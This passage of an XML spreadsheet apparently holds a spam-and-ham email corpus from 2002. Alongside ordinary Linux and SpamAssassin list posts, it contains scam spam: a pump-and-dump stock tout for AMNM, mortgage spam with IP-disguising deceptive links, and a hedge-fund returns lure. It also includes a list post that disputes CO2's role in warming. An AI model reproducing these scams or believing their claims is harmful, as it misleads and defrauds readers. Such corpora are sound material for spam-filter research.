 NT-SIZE: 10pt; PADDING-LEFT: 7px; PADDING-RIGHT: 7px"=20
    &gt;
       &lt;DIV&gt;Amnis Systems, Inc. (OTCBB:AMNM)&lt;/DIV&gt;
       &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;DIV&gt;CONTRACT ANNOUNCEMENTS AND HUGE NEWSLETTER COVERAGE THIS WEEK =
 FOR=20
       AMNM !!!&lt;/DIV&gt;
       &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;DIV&gt;This Thursday AMNM will be profiled by some major newsletters.=
 &amp;nbsp;=20
       There will be huge volume and a strong increase in price for severa=
 l=20
       days.&amp;nbsp; These are the same newsletters that profiled CLKS two w=
 eeks=20
       ago.&amp;nbsp; They brought CLKS from $1.50 to $4.35 in ten days.&amp;nbsp;=
  We=20
       know for certain that the same groups are going to profile AMNM sta=
 rting=20
       on Thursday.&lt;/DIV&gt;
       &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;DIV&gt;We are very proud that we can share this information with you =
 so that=20
       you can make a profit out of it.&amp;nbsp; It is highly advisable to ta=
 ke a=20
       position in AMNM as soon as possible, today before the market=20
       closes,&amp;nbsp; or tomorrow.&lt;/DIV&gt;
       &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;DIV&gt;The stock is trading near its 52 week low, and will start movi=
 ng up=20
       immediately.&amp;nbsp; We believe the stock could easiely reach $4 in l=
 ess=20
       than a month.&lt;/DIV&gt;
       &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
       &lt;DIV&gt;Good luck and watch AMNM fly this week!!&lt;/DIV&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD id=3DINCREDIFOOTER width=3D"100%"&gt;
 =09&lt;TABLE cellPadding=3D0 cellSpacing=3D0 width=3D"100%"&gt;
 =09&lt;TR&gt;
 =09&lt;TD width=3D"100%"&gt;&lt;/TD&gt;
 =09&lt;TD align=3Dmiddle id=3DINCREDISOUND vAlign=3Dbottom&gt;&lt;/TD&gt;
 =09&lt;TD align=3Dmiddle id=3DINCREDIANIM vAlign=3Dbottom&gt;&lt;/TD&gt;
 =09&lt;/TR&gt;
 =09&lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;&lt;SPAN=20
 id=3DIncrediStamp&gt;&lt;SPAN dir=3Dltr&gt;&lt;FONT face=3D"Arial, Helvetica, sans-se=
 rif"=20
 size=3D2&gt;_________________________________________________&lt;BR&gt;&lt;FONT=20
 face=3D"Comic Sans MS" size=3D2&gt;&lt;I&gt;IncrediMail&lt;/I&gt; - &lt;B&gt;Email has finally=
 =20
 evolved&lt;/B&gt; - &lt;/FONT&gt;&lt;A href=3D"http://www.incredimail.com/imstampa.html"=
 &gt;&lt;FONT=20
 face=3D"Times New Roman" size=3D3&gt;&lt;B&gt;&lt;U&gt;Click=20
 Here&lt;/U&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/FONT&gt;
 &lt;/BODY&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Prob. w/ install/uninstall
</t>
  </si>
  <si>
    <t xml:space="preserve">oh ok, thanx alot!! i was puttin the entire rpm package name like
 php-4.0.4pl1.i386.rpm
 that's why it wasn't working.
 -----Original Message-----
 From: rpm-zzzlist-admin@freshrpms.net
 [mailto:rpm-list-admin@freshrpms.net]On Behalf Of Matthias Saou (by way
 of Matthias Saou &lt;matthias@egwn.net&gt;)
 Sent: Friday, February 01, 2002 1:18 PM
 To: rpm-zzzlist@freshrpms.net
 Subject: Re: Prob. w/ install/uninstall
 Once upon a time, Brian wrote :
 &gt; hey i have a problem:
 &gt; i have a rpms that i have installed that i want to uninstall, i do it
 &gt; like so:
 &gt; rpm -e [rpm package]
 &gt; and it gives the error: package not installed, so i install it like
 &gt; so:
 &gt; rpm -i [rpm package]
 &gt; and it gives the error: package already installed, so i force it to
 &gt; install like so:
 &gt; rpm -i --force [rpm package]
 &gt; this installs it and then i try to uninstall it again and it still
 &gt; gives me the same error: package not installed.
 &gt;
 &gt; How can i get it to recognize that the package is indeed installed it,
 &gt; and/or get it to unstall it?
 You're a bit too vague on your "[rpm package]" here...
 Maybe this will help you :
 [root@python apg]# rpm -e apg
 [root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm
 Preparing...                ###########################################
 [100%]   1:apg
 ########################################### [100%][root@python apg]# rpm -e
 apg[root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm
 Preparing...                ###########################################
 [100%]   1:apg
 ########################################### [100%][root@python apg]# rpm -e
 apg-1.2.13-fr1[root@python apg]# rpm -ivh apg-1.2.13-fr1.i386.rpm
 Preparing...                ###########################################
 [100%]   1:apg
 ########################################### [100%][root@python apg]# rpm -e
 apg-1.2.13-fr1.i386.rpm error: package apg-1.2.13-fr1.i386.rpm is not
 installed[root@python apg]#
 You can just put the name, of the name and version, and even the release,
 but the entire filename will not work!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_______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-10
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * TPF Announces Newsletter Mailing List, Translations
     * search.cpan.org Out of Beta
 +--------------------------------------------------------------------+
 | TPF Announces Newsletter Mailing List, Translations                |
 |   posted by KM on Friday August 09, @13:03 (links)                 |
 |   http://use.perl.org/article.pl?sid=02/08/09/174257               |
 +--------------------------------------------------------------------+
 [0]gnat writes "We've set up a mailing list for the monthly Perl
 Foundation newsletters, and [1]the July newsletter went out on Thursday.
 If you donated to YAS and The Perl Foundation, you are already subscribed
 at the email address you provided when you donated. If you haven't
 donated and want to subscribe, send an empty email message to
 foundation-newsletter-subscribe@perl.org (and also consider [2]donating
 :-).
 In other newsletter news, we have a [3]French translation of the July
 newsletter on the web site. Thanks to mirod (Michel Rodriguez) for making
 that happen. Translations into other languages are welcome--please
 contact Kevin Meltzer (kevinm AT yetanother.org)."
 I *heart* your translations!
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/09/174257
 Links:
     0. mailto:gnat@frii.com
     1. http://www.perl-foundation.org/index.cgi?page=newsletter
     2. http://www.perl-foundation.org/index.cgi?page=contrib
     3. http://www.perl-foundation.org/index.cgi?page=fr/tpf-newsletter-0702
 +--------------------------------------------------------------------+
 | search.cpan.org Out of Beta                                        |
 |   posted by KM on Friday August 09, @16:46 (cpan)                  |
 |   http://use.perl.org/article.pl?sid=02/08/09/2046256              |
 +--------------------------------------------------------------------+
 [0]gbarr writes "Since announcing the [1]search beta site a OSCON we have
 recieved several feedback messages. Some have suggested changes, which we
 appriciate and most will be implemented. But many of the messages were
 just requesting it to become [2]search.cpan.org. So by popular demand the
 switch will happen this weekend." Sweet!
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/09/2046256
 Links:
     0. mailto:gbarr-tucs@mutatus.co.uk
     1. http://search-beta.cpan.org/
     2. http://search.cpan.org/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</si>
  <si>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Hoag's Object
</t>
  </si>
  <si>
    <t xml:space="preserve">http://oposite.stsci.edu/pubinfo/pr/2002/21/
 (Shows a picture of a wheel within a wheel galaxy).
 The universe is a strange and wonderful place.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you need a second MORTGAGE?                    26828
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;DEAR HOMEOWNER,&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 .main {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12=
 px; color: #212121}
 .footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #ED1C24}
 A:visited {text-decoration: none; color: #ED1C24}
 A:active {text-decoration: none; color: #F7941D}
 A:hover {text-decoration: none; color: #000000}
 A.yellow:link {text-decoration: none; color: #FFFFFF}
 A.yellow:visited {text-decoration: none; color: #FFFFFF}
 A.yellow:active {text-decoration: none; color: #000000}
 A.yellow:hover {text-decoration: none; color: #E6E6E6}
 &lt;/style&gt;
 &lt;body bgcolor=3D"#DADADA" topmargin=3D"4"&gt;
 &lt;table width=3D"600" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" alig=
 n=3D"center" bordercolor=3D"#000066" class=3D"main" bgcolor=3D"#F2F2F2"&gt;
   &lt;tr&gt; 
     &lt;td&gt;
       &lt;table width=3D"560" align=3D"center" border=3D"0" cellspacing=3D"2"=
  cellpadding=3D"8"&gt;
         &lt;tr&gt; 
           &lt;td&gt;
             &lt;p&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Dear &lt;/font&gt;&lt;font size=3D"4" color=3D"#=
 0000CC"&gt;HOMEOWNER,&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#000099"&gt; 
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"6" cellpadding=3D"6=
 " class=3D"main"&gt;
         &lt;tr&gt;
           &lt;td&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"3"&gt;Inte=
 rest rates are at their lowest point in 40 
               years!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table width=3D"590" border=3D"0" cellspacing=3D"2" cellpadding=3D"4=
 " class=3D"main"&gt;
         &lt;tr&gt; 
           &lt;td width=3D"50%" valign=3D"top"&gt;
             &lt;div align=3D"center"&gt; &lt;b&gt;&lt;font size=3D"5"&gt;Let us do the shopp=
 ing for 
               you... AND IT'S FREE!&lt;/font&gt;&lt;/b&gt; 
               &lt;p&gt;&lt;img src=3D"http://61.129.81.70/pix2/images/ad2.gif" widt=
 h=3D"142" height=3D"218"&gt;&lt;/p&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"50%" valign=3D"top"&gt;&lt;font size=3D"3"&gt;&lt;i&gt;&lt;br&gt;
             Our nationwide network of lenders have hundreds of different l=
 oan 
             programs to fit your current situation:&lt;/i&gt; &lt;b&gt; 
             &lt;ul&gt;
               &lt;li&gt;Refinance&lt;/li&gt;
               &lt;li&gt;Second Mortgage&lt;/li&gt;
               &lt;li&gt;Debt Consolidation&lt;/li&gt;
               &lt;li&gt;Home Improvement&lt;/li&gt;
               &lt;li&gt;Purchase &lt;/li&gt;
             &lt;/ul&gt;&lt;/b&gt;
             &lt;p&gt;&lt;/p&gt;
             &lt;p&gt;Please &lt;b&gt;&lt;a href=3D"http://www.812191956734203545847582013=
 @61.129.81.70/pix2/mortgageform.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt; to fill out a quic=
 k form. Your 
               request will be transmitted to our network of mortgage speci=
 alists.&lt;/p&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"2=
 "&gt;
         &lt;tr&gt;
           &lt;td bgcolor=3D"#0D86FF"&gt; &lt;font size=3D"2"&gt; 
             &lt;div align=3D"center"&gt;&lt;br&gt;
             &lt;/div&gt;
             &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"8=
 " class=3D"main"&gt;
         &lt;tr&gt;
           &lt;td bgcolor=3D"#0066CC"&gt; 
             &lt;div align=3D"center"&gt;
               &lt;div align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;This service is &lt;a=
  href=3D"http://www.812191956757575734203545847582013@61.129.81.70/pix2/mo=
 rtgageform.htm" class=3D"yellow"&gt;100% 
                 FREE&lt;/a&gt; to home owners and new home buyers without any ob=
 ligation.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/div&gt;
             &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table align=3D"center" width=3D"600" cellspacing=3D"2" cellpadding=3D"2" =
 border=3D"0" class=3D"footer"&gt;
   &lt;tr&gt; 
     &lt;td colspan=3D"2"&gt;&lt;br&gt;
       &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in err=
 or?&lt;/font&gt; 
       Our goal is to only target individuals who would like to take advant=
 age 
       of our offers. If you'd like to be removed from our mailing list, pl=
 ease 
       click on the link below. You will be removed immediately and automat=
 ically 
       from all of our future mailings.&lt;br&gt;
       &lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td&gt;We protect all email addresses from other third parties. Thank you=
 .&lt;/td&gt;
     &lt;td align=3D"right"&gt;&lt;a href=3D"http://61.129.81.52/remove/remove.htm"&gt;=
 Please remove me.&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-196335410P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Wed, 21 Aug 2002 15:01:07 +0700
 &gt;
 &gt;     Date:        Tue, 20 Aug 2002 22:51:52 -0400
 &gt;     From:        Valdis.Kletnieks@vt.edu
 &gt;     Message-ID:  &lt;200208210251.g7L2pqKb001805@turing-police.cc.vt.edu&gt;
 &gt; 
 &gt;   | Ever tried to get MH to *not* have a 'pseq' sequence?
 &gt; 
 &gt; Hmm - I've been using MH for a long time (since well before there were
 &gt; sequences) and I don't think I've ever seen a "pseq" ...
 &gt; 
 &gt; I'm guessing that that's the sequence that you have "pick" create
 &gt; As I recall it, it has no default sequence name, so the sequence names
 &gt; that people use will tend to vary from person to person won't they
 &gt; (except as MH configurations move around institutions by osmosis).
 &gt; 
 &gt; I've always used "sel" for that purpose.
 &gt; 
 &gt; I kind of doubt that any pre built-in sequence name is going to be
 &gt; very general.   Even "unseen" can be changed (fortunately that one
 &gt; is easy to find in the MH profile - though whether exmh does that,
 &gt; os just uses "unseen" I haven't bothered to find out).
 I've never seen pseq either.
 BTW, it's kinda amusing for a short while to show the cur sequence.  Watching 
 that helped me find a number of bugs.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-196335410P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y676K9b4h5R0IUIRAt/rAJ9huaTFeBLHluu/vhFc1GWy3X+YywCgh0XF
 o7+XfPSIQbz9hkFFBMTYd1k=
 =969s
 -----END PGP SIGNATURE-----
 --==_Exmh_-196335410P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">oops, I am bad, I need to learn how to spell......
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/masses/tenpass - New directory
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/masses/tenpass
 In directory usw-pr-cvs1:/tmp/cvs-serv26829/tenpass
 Log Message:
 Directory /cvsroot/spamassassin/spamassassin/masses/tenpass added to the repository
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">thx for the thoughts gentlemen (yes as someone said i use terms loosely) -
 more than cool ---&gt;
 quality: snobs only care about mpixels. this is about communications.  the
 general public cares about speed not quality.  how is akamai doing these
 days? not to mention any other QOS businesses that come to mind.
 implementation: point about hooking to usb, wires, etc. AGREE 100%. these
 implementations are super clunky, attachable camera needs to be integrated a
 la nokia model.  basically useless until better handsets are released i
 think.
 adoption: ian brought up the 'fax' problem.  brilliant thing is, this is far
 more personal than faxes so can be justified more easily and marketed in
 family packs etc. but yes, the usual rules apply as MMS phones have network
 efx.
 content: who cares about content?  that no one can think of 'useful' content
 is always the business persons mistake. the content is the users
 communications.  its anything and everything.  avg person could easily send
 half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 cares if content is trivial in nature. picture speaks a thousand words.
 display: why are dig camera displays better than cell phones?  does anyone
 know who makes these small displays and what the trends are around them?
 misc ramblings: i suppose you skeptical forkers would have said the same
 thing about '1 hour photo' processing.  trivial, who needs it, i get better
 resultion elswhere.  and yet, it had great decentralizing impact - the plant
 had to be downsized and pushed to the retail operation - the digital camera,
 and finally the integrated digital camera phone brings this cycle of
 decentralization in photography to a logical conclusion (which will put the
 photo giants to bed) and change the world in a meaningful way.  also, SMS
 didn't take off because its easy, it took off because it costs less.  its
 greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 traffic over others because of its ratio of cost to bandwidth.  in reality,
 SMS cannibilizes the voice rev's they bought their networks to handle.
 ps:  it is relatively amusing that one 'low resolution' complaint dropped
 just after Joe watched a CARTOON on his television..
 You're right. Or at least, I don't. I saw an advert for it on TV last
 night (can't miss Futurama :-) and I thought, "boy, that's dumb."
 If I wanted to share pictures with someone, I'd email them to them,
 where they could see them on a 1024x or 1600x display, instead of
 rob
 -----Original Message-----
 From: Eugen Leitl [mailto:eugen@leitl.org]
 Sent: Monday, August 19, 2002 1:34 AM
 To: Rob Shavell
 Cc: fork@example.com
 Subject: Re: sprint delivers the next big thing??
 On Sun, 18 Aug 2002, Rob Shavell wrote:
 &gt; down in the tech world than mobile visual communications.. and yet no one
 &gt; seems to give much of a damn that right now that 2 persons can take photos
 &gt; and share them instantly across space.  this is one of the biggest - and
 The word "trivial" comes to mind.
 &gt; last - fundamental changes in human communications.  will be as big as the
 &gt; browser.
 Remote realtime streaming video is neat, but sharing pictures? You invoke
 big words rather readily.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CO2 and climate (was RE: Goodbye Global Warming)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-09-23 at 13:53, Jim Whitehead wrote:
 &gt; 
 &gt; You have not explained why the increase in CO2 concentrations is not
 &gt; contributing to increasing global temperature.
 There are a number of reasons to think that CO2 is not important to
 controlling global temperature and that much of the CO2 increase may not
 be anthropogenic. Some recent research points worth mentioning:
 Recent high-resolution studies of historical CO2 concentrations and
 temperatures over hundreds of thousands of years have shown a modest
 correlation between the two. In a number of cases, CO2 level increases
 are not in phase with temperature increases and actually trail the
 increase in temperature by a short time i.e. increases in temperature
 preceded increases in CO2 concentrations. The more studies that are done
 of the geological record, the more it seems that CO2 concentrations are
 correlated with temperature increases, but are not significantly
 causative. There is a lot of evidence that CO2 levels are regulated in a
 fairly stable fashion.  I don't believe anyone really has an
 authoritative answer as to exactly how this works yet.
 With respect to absolute CO2 concentrations, it is also important to
 point out that our best data to date suggests that they follow a fairly
 regular cycle with a period of about 100,000 years.  At previous cycle
 peaks, the concentrations were similar to what they are now.  If this
 cycle has any validity (and we only have good data for 4-5 complete
 cyclical periods, but which look surprisingly regular in shape and
 time), then we should be almost exactly at a peak right now.  As it
 happens, current CO2 concentrations are within 10% of other previous
 cyclical concentration peaks for which we have good data. In other
 words, we may be adding to the CO2 levels, but it looks a lot like we
 would be building a molehill on top of a mountain in the historical
 record.  At the very least, there is nothing anomalous about current CO2
 concentrations.
 Also, CO2 levels interact with the biosphere in a manner that ultimately
 affects temperature.  Again, the interaction is not entirely
 predictable, but this is believed to be one of the regulating negative
 feedback systems mentioned above.
 Last, as greenhouse gases go, CO2 isn't particularly potent, although it
 makes up for it in volume in some cases.  Gases such as water and
 methane have a far greater impact as greenhouse gases on a per molecule
 basis.  Water vapor may actually be the key greenhouse gas, something
 that CO2 only indirectly effects through its interaction with the
 biosphere.
 CO2 was an easy mark for early environmentalism, but all the recent
 studies and data I've seen gives me the impression that it is largely a
 passenger on the climate ride rather than the driver.  I certainly don't
 think it is a healthy fixation if we're actually interested in
 understanding warming trends.
 Cheers,
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt; Sender: exmh-users-admin@example.com
 &gt; Date: Fri, 13 Sep 2002 21:30:34 +1000
 &gt; 
 &gt; On Fri Sep 13 2002 at 17:55, Robert Elz wrote:
 &gt; 
 &gt; &gt;     Date:        Fri, 13 Sep 2002 11:26:30 +1000
 &gt; &gt;     From:        Tony Nugent &lt;tony@linuxworks.com.au&gt;
 &gt; 
 &gt; &gt;   | I can cut'n'paste from exmh's message display window into spawned
 &gt; &gt;   | gvim processes, but not into anything else.
 &gt; &gt; 
 &gt; &gt; That's odd.  I cut &amp; paste between all kinds of windows (exmh into
 &gt; 
 &gt; Not so odd, this issue came up several weeks ago (with no real
 &gt; resolution).
 &gt; 
 &gt; &gt; mozilla, xterm, another wish script of mine I use for DNS tasks (but
 &gt; &gt; that one I guess is to be expected) netscape (when I used to use it,
 &gt; &gt; but I suppose it and mozilla are the same codebase, approx) - in fact
 &gt; &gt; I can't thing of anything it fails for, that I have noticed.
 &gt; &gt; 
 &gt; &gt; What is an example of an "anything else" that it fails for for you?
 &gt; 
 &gt; Everything else :)  I can't even mark text in an exmh message window
 &gt; and then paste it into a terminal window, the cut buffer seems to be
 &gt; completely empty (and its previous contents are no longer there
 &gt; either).
 &gt; 
 &gt; &gt; kre
 &gt; 
 &gt;   BTW: talking of spring downunder... I'm in Queensland.  It almost
 &gt;   feels like early summer already (winters here are dry and warm,
 &gt;   much better than cold wet miserable Melbourne :-)  Despite some
 &gt;   recent rain (first in months), we are already into a drought, with
 &gt;   an El-Nino on the way it is only going to get worse...  (the last
 &gt;   one in the 90s caused one of the worst droughts ever seen here in
 &gt;   aussie).
 (This is all guess work and may be bogus.)
 Are you running Gnome 1.4? I had similar problems as did several
 co-workers. Updating my Gnome components has fixed it for me and
 others, although I can't say exactly which component did the
 trick. Gnomecore or gtk would seem most likely, but it may have been
 something else.
 In any case, I have not seen the problem for quite a while, now.
 R. Kevin Oberman, Network Engineer
 Energy Sciences Network (ESnet)
 Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
 E-mail: oberman@es.net			Phone: +1 510 486-8634
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]Church, AA, same diff?
 AA is sort of church with ashtrays.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Tom said:
 &gt; &gt;
 &gt; &gt; The question then becomes, why is knowledge sharing such a difficult 
 &gt; &gt; thing in organizations?
 And Owen replied:
 &gt; Well, IMNHO, its because companies do not reward knowledge sharers. When 
 I don't work in this area, but I have a suspicion that many people
 suspect projects for "knowledge management" and "knowledge sharing" as
 attempts to eliminate their jobs, or at least their importance. If "the
 organization" knows all the things I know, why does it need me?
 This should actually be easy to test experimentally: compare the results
 of having someone call up and say, "Can you show us how to do X for this
 project we're working on?" with those of having someone summoned by a
 knowledge management project to explain how to do X for the knowledge
 archives.
     - Win
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Scoring Yahoo Ads
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Matt Kettler &lt;mkettler@evi-inc.com&gt;
 &gt; Hmm, I think that Marc, being one of the most active and prolific posters 
 &gt; to this list, certainly understands SA much better than most. Certainly 
 Frequency of messages does _not_ let you draw valid conclusions about the
 understanding of the issues at hand of the sender.
 IMHO it's sometimes even inversely proportional.
 &gt; Marc is an active and prolific contributor to SA (gee, look, his name's 
 &gt; even in the credit's page on the website!).
 This should not impress you so much. At one time I even detected my name
 on that page and I contributed less than a handful of rather simple rules.
 That's not to say I don't appreciate Marc's contributions to the effort.
 But in his place I would have (hopefully :) reevaluated my arguments in the
 face of, as I saw it, massive rejection of his idea what constitutes spam.
 Maybe this list can return to discussing technical topics. Politics should
 go to spamassassin-talk.
 ciao
      Klaus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</si>
  <si>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Nationwide predicts 23% house price rise
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8457387,215/
 Date: 2002-10-02T04:57:55+01:00
 *Money:* Britain's biggest building society has signalled it expects no let-up 
 in the runaway property boom.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 DATA
 Message-ID: &lt;MnAtWBN0tB8txc.Hc6wd_JBTgZl-I_CrtjZsF@mail.&gt;
 From: jasper5645@yahoo.com &lt;jasper5645@yahoo.com&gt;
 Bcc:
 Subject: Secrets of the Ultra Wealthy Revealed ...
 Date: Sun, 04 Aug 2024 06:40:35 -0400 (EDT)
 MIME-Version: 1.0
 Content-Type: TEXT/HTML; charset="US-ASCII"
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;B&gt;&lt;FONT SIZE=+1&gt;For years, Hedge investors have made money
 in both bear and bull markets. But until recently, hedge trading has been
 limited to only the ultra wealthy and well connected investors.&lt;/FONT&gt;&lt;/B&gt;
 &lt;P&gt;&lt;B&gt;&lt;I&gt;&lt;FONT SIZE=+1&gt;For a limited time&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;, &lt;B&gt;&lt;FONT SIZE=+1&gt;you
 have the opportunity to follow a Hedge trader who has had a compounded
 average annual rate of return of &lt;FONT COLOR="#CC0000"&gt;74.9%&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT SIZE=+1&gt;Best of all, your invited to look over the shoulder
 of a trader who is actually making money in 2001 and watch him in action
 for &lt;/FONT&gt;&lt;I&gt;&lt;FONT COLOR="#CC0000"&gt;&lt;FONT SIZE=+2&gt;FREE !!!&lt;/FONT&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT SIZE=+1&gt;To take advantage of this &lt;I&gt;&lt;FONT COLOR="#CC0000"&gt;FREE&lt;/FONT&gt;&lt;/I&gt;
 one-month access to our private web site, simply reply to this message
 with "opt in" in the subjest heading and we will reply to you with our
 site location information within 24 hrs.&lt;/FONT&gt;&lt;/B&gt;
 &lt;BR&gt;&lt;B&gt;&lt;FONT SIZE=+1&gt;&lt;/FONT&gt;&lt;/B&gt;&amp;nbsp;&lt;B&gt;&lt;FONT SIZE=+1&gt;&lt;/FONT&gt;&lt;/B&gt;
 &lt;P&gt;&lt;B&gt;To be removed, "&lt;FONT COLOR="#3366FF"&gt;&lt;A HREF="http://www.sqhosting.org/remove.html"&gt;click
 here&lt;/A&gt;&lt;/FONT&gt;"&lt;/B&gt;
 &lt;BR&gt;&amp;nbsp;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ******************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 09:44:08PM -0400, Sven wrote:
 &gt; With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have
 &gt; managed to get smrazor working (milter) -- sort of ... With light server
 &gt; loads, it seems to do fine; however during peak traffic times (or peak
 &gt; catalogue server usage???) , the smrazor milter stops and sometime dumps
 &gt; core as well.  Does anyone know of a limit in terms of number of
 &gt; messages/minute that can be theoretically processed? I have noticed timeouts
 &gt; occuring (I set the milter timeout per message to 15 seconds) often in huge
 &gt; lumps and the occasional "Could not get valid info from Discovery Servers")
 &gt; ?????
 15 seconds is more than enough timeout... There's no request/minute limit,
 and we are not close to hardware limits on any of the servers.
